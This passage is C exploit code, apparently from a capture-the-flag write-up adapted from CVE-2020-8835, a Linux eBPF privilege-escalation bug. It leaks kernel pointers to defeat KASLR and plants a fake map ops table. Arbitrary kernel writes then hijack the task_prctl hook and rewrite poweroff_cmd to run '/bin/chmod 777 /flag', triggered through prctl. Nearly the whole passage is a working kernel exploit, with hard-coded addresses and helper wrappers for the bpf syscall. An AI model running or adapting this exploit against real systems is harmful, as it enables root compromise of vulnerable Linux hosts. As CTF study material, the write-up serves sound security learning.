 * call prctl().
 * NOTE(review): malloc() results and every bpf_update_elem() /
 * bpf_lookup_elem() return value are unchecked.
 */
void pwn(){
    printf("pwning...\n");
    uint32_t key = 0x0;
    char *ctrlbuf = malloc(0x100);
    char *expbuf = malloc(0x3000);
    uint64_t *ctrlbuf64 = (uint64_t *)ctrlbuf;
    uint64_t *expbuf64 = (uint64_t *)expbuf;

    memset(ctrlbuf,'A',0x100);
    for(int i=0;i<0x2000/8;i++){
        expbuf64[i] = i+1;
    }
    ctrlbuf64[0]=0x100000000;   /* input value for r8 */
    ctrlbuf64[1]=0x0;           /* first pass: conditional stores are skipped */
    bpf_update_elem(ctrlmapfd,&key,ctrlbuf,0);
    bpf_update_elem(expmapfd,&key,expbuf,0);
    writemsg();

    // leak
    memset(ctrlbuf,0,0x100);
    bpf_lookup_elem(ctrlmapfd,&key,ctrlbuf);
    x64dump(ctrlbuf,8);
    bpf_lookup_elem(expmapfd,&key,expbuf);
    x64dump(expbuf,8);
    uint64_t map_leak = ctrlbuf64[2];
    uint64_t elem_leak = ctrlbuf64[3]-0xc0+0x110;
    //uint64_t kaslr = map_leak - 0xffffffff82016340;
    /* offset of the leaked pointer from its hard-coded static address */
    uint64_t kaslr = map_leak - 0xffffffff82016880;
    //uint64_t modprobe_path = 0xffffffff82446d80 + kaslr;
    loglx("map_leak",map_leak);
    loglx("elem_leak",elem_leak);
    loglx("kaslr",kaslr);
    //loglx("modprobe",modprobe_path);
    getchar();

    /*
     * Copy of the ops table shown in the article, relocated by kaslr.
     * Entries 5 and 15 (1-based) hold the same address.
     */
    uint64_t fake_map_ops[]={
        kaslr + 0xffffffff81162ef0,
        kaslr + 0xffffffff81163df0,
        0x0,
        kaslr + 0xffffffff811636c0,
        kaslr + 0xffffffff81162fe0, // map_get_next_key (entry 5)
        0x0,
        0x0,
        kaslr + 0xffffffff81149240,
        0x0,
        kaslr + 0xffffffff81149020,
        0x0,
        kaslr + 0xffffffff81163060,
        kaslr + 0xffffffff811635b0,
        kaslr + 0xffffffff81163010,
        kaslr + 0xffffffff81162fe0, // map_push_elem slot (entry 15)
        0x0,
        0x0,
        0x0,
        0x0,
        kaslr + 0xffffffff81163310,
        0x0,
        kaslr + 0xffffffff81163140,
        kaslr + 0xffffffff81163c60,
        0x0,
        0x0,
        0x0,
        kaslr + 0xffffffff81162f70,
        kaslr + 0xffffffff81162fa0,
        kaslr + 0xffffffff811630e0,
    };

    // place the fake ops table in the map value
    memcpy(expbuf,(void *)fake_map_ops,sizeof(fake_map_ops));
    bpf_update_elem(expmapfd,&key,expbuf,0);

    // second pass: ctrl_map[1] == 2 enables the conditional stores
    ctrlbuf64[0]=0x100000000;
    ctrlbuf64[1]=0x2;
    bpf_update_elem(ctrlmapfd,&key,ctrlbuf,0);
    bpf_update_elem(expmapfd,&key,expbuf,0);
    x64dump(ctrlbuf,8);
    x64dump(expbuf,8);
    writemsg();

    // overwrite the hp->hook.task_prctl
    uint64_t poweroff_work_func = 0xFFFFFFFF8108B240 + kaslr;
    uint64_t poweroff_cmd = 0xFFFFFFFF82448260 + kaslr;
    uint64_t hp_hook = 0xffffffff824b3fa0 + kaslr;
    /* each update below passes (32-bit value - 1) in the value and an address as flags */
    expbuf64[0] = (poweroff_work_func & 0xffffffff) - 1;
    bpf_update_elem(expmapfd,&key,expbuf,hp_hook);
    expbuf64[0] = (poweroff_work_func >> 32) - 1;
    bpf_update_elem(expmapfd,&key,expbuf,hp_hook+4);

    // overwrite poweroff_cmd with "/bin/chmod 777 /flag", four bytes at a time
    expbuf64[0] = 0x6e69622f - 1;   /* "/bin" */
    bpf_update_elem(expmapfd,&key,expbuf,poweroff_cmd);
    expbuf64[0] = 0x6d68632f - 1;   /* "/chm" */
    bpf_update_elem(expmapfd,&key,expbuf,poweroff_cmd+4);
    expbuf64[0] = 0x3720646f - 1;   /* "od 7" */
    bpf_update_elem(expmapfd,&key,expbuf,poweroff_cmd+8);
    expbuf64[0] = 0x2f203737 - 1;   /* "77 /" */
    bpf_update_elem(expmapfd,&key,expbuf,poweroff_cmd+0xc);
    expbuf64[0] = 0x67616c66 - 1;   /* "flag" */
    bpf_update_elem(expmapfd,&key,expbuf,poweroff_cmd+0x10);

    // trigger
    prctl(0,0);
    return;
}

int main(int argc,char **argv){
    init();
    prep();
    pwn();
    return 0;
}

/* Print err to stderr and terminate with exit(-1). */
static void __exit(char *err) {
    fprintf(stderr, "error: %s\n", err);
    exit(-1);
}

/*
 * Write 64 bytes to sockets[0]; the program is attached to sockets[1].
 * NOTE(review): buffer is sent uninitialized, and "%lu" is used to print
 * an ssize_t.
 */
static void writemsg(void) {
    char buffer[64];
    ssize_t n = write(sockets[0], buffer, sizeof(buffer));
    if (n < 0) {
        perror("write");
        return;
    }
    if (n != sizeof(buffer))
        fprintf(stderr, "short write: %lu\n", n);
}

/* bpf(BPF_PROG_LOAD) wrapper; prog_len is in bytes, log goes to bpf_log_buf. */
static int bpf_prog_load(enum bpf_prog_type prog_type,
        const struct bpf_insn *insns, int prog_len,
        const char *license, int kern_version){
    union bpf_attr attr = {
        .prog_type = prog_type,
        .insns = (uint64_t)insns,
        .insn_cnt = prog_len / sizeof(struct bpf_insn),
        .license = (uint64_t)license,
        .log_buf = (uint64_t)bpf_log_buf,
        .log_size = LOG_BUF_SIZE,
        .log_level = 1,
    };
    attr.kern_version = kern_version;
    bpf_log_buf[0] = 0;
    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

/* bpf(BPF_MAP_CREATE) wrapper. */
static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
        int max_entries){
    union bpf_attr attr = {
        .map_type = map_type,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries
    };
    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

/* bpf(BPF_MAP_UPDATE_ELEM) wrapper; flags is passed through unchanged. */
static int bpf_update_elem(int fd ,void *key, void *value,uint64_t flags){
    union bpf_attr attr = {
        .map_fd = fd,
        .key = (uint64_t)key,
        .value = (uint64_t)value,
        .flags = flags,
    };
    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

/* bpf(BPF_MAP_LOOKUP_ELEM) wrapper. */
static int bpf_lookup_elem(int fd,void *key, void *value){
    union bpf_attr attr = {
        .map_fd = fd,
        .key = (uint64_t)key,
        .value = (uint64_t)value,
    };
    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}
这道题目很好地改编了CVE,非常考验对于bpf指令检测的了解和调试,综合难度很高,再次感谢sunichi
师傅的帮助。
CVE-2020-8835 pwn2own 2020 ebpf 提权漏洞分析